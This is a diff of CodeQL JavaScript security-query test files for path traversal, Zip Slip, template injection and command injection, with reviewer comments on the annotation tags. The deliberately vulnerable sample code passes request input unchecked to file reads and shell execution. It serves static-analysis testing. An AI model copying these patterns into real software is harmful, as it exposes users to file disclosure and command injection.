a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,7 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index cc36f38be2dc..ba57e930f03f 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system @@ -33,7 +33,7 @@ var server = http.createServer(function(req, res) { path = sanitize(path); res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; + path = url.parse(req.url, true).query.path; // $ Source // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved @@ -70,7 +70,7 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, @@ -106,13 +106,13 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert 
@@ -136,7 +136,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); @@ -181,14 +181,14 @@ var server = http.createServer(function(req, res) { const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source cp.execSync("foobar", {cwd: path}); // $ Alert cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); @@ -197,7 +197,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index a3e4028b0daa..568269866f5f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js 
@@ -5,7 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 2c251b8de379..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -8,7 +8,7 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -18,7 +18,7 @@ app.get('/basic', (req, res) => { }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -28,7 +28,7 @@ app.get('/normalize', (req, res) => { }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; @@ -51,7 +51,7 @@ app.get('/normalize-notAbsolute', (req, res) => { }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; 
@@ -70,7 +70,7 @@ app.get('/normalize-noInitialDotDot', (req, res) => { app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) fs.readFileSync(path); @@ -79,7 +79,7 @@ app.get('/prepend-normalize', (req, res) => { }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; @@ -91,7 +91,7 @@ app.get('/absolute', (req, res) => { }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; @@ -114,7 +114,7 @@ app.get('/combined-check', (req, res) => { }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert @@ -127,7 +127,7 @@ app.get('/realpath', (req, res) => { }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); @@ -136,7 +136,7 @@ app.get('/coerce-relative', (req, res) => { }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) fs.readFileSync(path); 
@@ -145,7 +145,7 @@ app.get('/coerce-absolute', (req, res) => { }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check @@ -157,7 +157,7 @@ app.get('/concat-after-normalization', (req, res) => { }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; @@ -171,7 +171,7 @@ app.get('/noDotDot', (req, res) => { }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. @@ -211,7 +211,7 @@ app.get('/join-regression', (req, res) => { }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) fs.readFileSync(path); @@ -223,7 +223,7 @@ app.get('/decode-after-normalization', (req, res) => { }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { fs.readFileSync(path); // $ Alert @@ -233,7 +233,7 @@ app.get('/replace', (req, res) => { }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert 
@@ -251,7 +251,7 @@ app.get('/resolve-path', (req, res) => { }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -300,7 +300,7 @@ app.get('/relative-startswith', (req, res) => { var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { fs.readFileSync(path); @@ -336,7 +336,7 @@ app.get('/pseudo-normalizations', (req, res) => { }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -351,7 +351,7 @@ app.get('/yet-another-prefix', (req, res) => { var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -374,7 +374,7 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -382,7 +382,7 @@ app.get('/slash-stuff', (req, res) => { }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert @@ -409,7 +409,7 @@ app.get('/join-spread', (req, res) => { }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 8d2bfe11feb7..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,7 +6,7 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert gracefulFs.readFileSync(path); // $ Alert @@ -35,7 +35,7 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source util.promisify(fs.readFileSync)(path); // $ Alert require("bluebird").promisify(fs.readFileSync)(path); // $ Alert @@ -46,7 +46,7 @@ http.createServer(function(req, res) { const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert asyncFS.readFileSync(path); // $ Alert @@ -65,7 +65,7 @@ http.createServer(function(req, res) { const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert mkdirp(path); // $ Alert @@ -78,7 +78,7 @@ function func(x) { const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fsp.readFile(path); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index d3ee99d4974b..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,7 +3,7 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; + const { p } = req.params; // $ Source prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 37f8c348a0f6..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js @@ -2,7 +2,7 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index fa19da302606..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js 
@@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index aaa6cfdc2407..ab5d3f008507 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -36,7 +36,7 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source nodefs.readFileSync(path); // $ Alert }); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index e18e3c7e8bb1..a21ae5a6f915 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index d705be16b317..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path.substring(i, j)); fs.readFileSync(path.substring(4)); // $ Alert fs.readFileSync(path.substring(0, i)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 097bcc1fa117..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; return fs.readFileSync(loc); // $ Alert } 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index 51549ea75658..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index f16a816b73c4..e7ad3b8e264d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -5,7 +5,7 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; @@ -13,14 +13,14 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(Writer({path: fileName})); + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - var file = fs.openSync(fileName, "w"); + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); 
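Review bot: In ZipSlipBad.js the `// $ Alert` tag stays on the line that reads the archive entry name (`const fileName = entry.path;`) and the new `// $ Sink` tag goes on the write call. That is the reverse of the TaintedPath tests in this commit, where the request read is `$ Source` and the file access is `$ Alert`. Nothing in the file says this is intended, so a reader may take it for a mis-tagged test. A short header comment would settle it, for example `// The alert is reported on the archive entry path; $ Sink marks where that path reaches the file system.` The same applies to the `zip.files` and `zip.forEach` cases in the next hunk and to ZipSlipBad2.js and ZipSlipBadUnzipper.js.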
@@ -28,11 +28,11 @@ const zip = new JSZip(); const path = require('path'); function doZipSlip() { for (const name in zip.files) { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink } zip.forEach((name, file) => { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index 6960ac4eeae1..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js @@ -3,6 +3,6 @@ var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { var fileName = 'output/path/' + entry.path; // $ Alert - fs.writeFileSync(fileName, entry.contents); + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 2ba62e67480d..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -5,5 +5,5 @@ fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { var fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index 8b6c30c46947..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js 
@@ -4,8 +4,8 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source res.render('template', bodyParameter); // $ Alert res.render('template', queryParameter); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 8f8b075010bf..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -3,7 +3,7 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -23,7 +23,7 @@ app3.post('/path', require('body-parser').json(), function(req, res) { var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -31,7 +31,7 @@ var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); 
@@ -39,7 +39,7 @@ var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 3f50d6d5df66..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,7 +5,7 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; + const title = github.context.payload.pull_request.title; // $ Source exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; @@ -15,7 +15,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; + const head_ref = github.context.payload.pull_request.head.ref; // $ Source aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); 
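Review bot: The context comment above `exec_head_ref` in CommandInjection/actions.js still reads `// function which passes the issue title into an exec`, but the source annotated on the next line is `github.context.payload.pull_request.head.ref`, not a title. The new `// $ Source` tag draws the reader to exactly that line, so the comment should name the value that actually reaches the shell string, e.g. `// function which passes the pull request head ref into an exec`. Both the title and the head ref are set by whoever opens the pull request, which is why each is a source in this test.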
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index ed1c9041a8ea..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -3,7 +3,7 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source cp.exec("foo"); cp.execSync("foo"); @@ -36,25 +36,25 @@ var server = http.createServer(function(req, res) { sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // $ Alert + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile("/bin/bash", args); // $ Alert args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink run("sh", args); args = []; args[0] = `-` + "c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink let myArgs = []; myArgs.push(`-` + "c"); 
@@ -63,14 +63,14 @@ var server = http.createServer(function(req, res) { }); -function run(cmd, args) { +function run(cmd, args) { // $ Sink cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source util.promisify(cp.exec)(cmd); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b2cfe4424039..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index 9d12f22bb249..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // $ Alert + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 1cfc40856113..45f3e25a8971 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -15,6 +15,6 @@ function execEach(commands) { }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 0efc3279cf50..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -10,7 +10,7 @@ app.post('/profile', upload.single('avatar'), function (req, res, next) { }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { + req.files.forEach(file => { // $ Source exec("touch " + file.originalname); // $ Alert }) }); @@ -21,7 +21,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { + 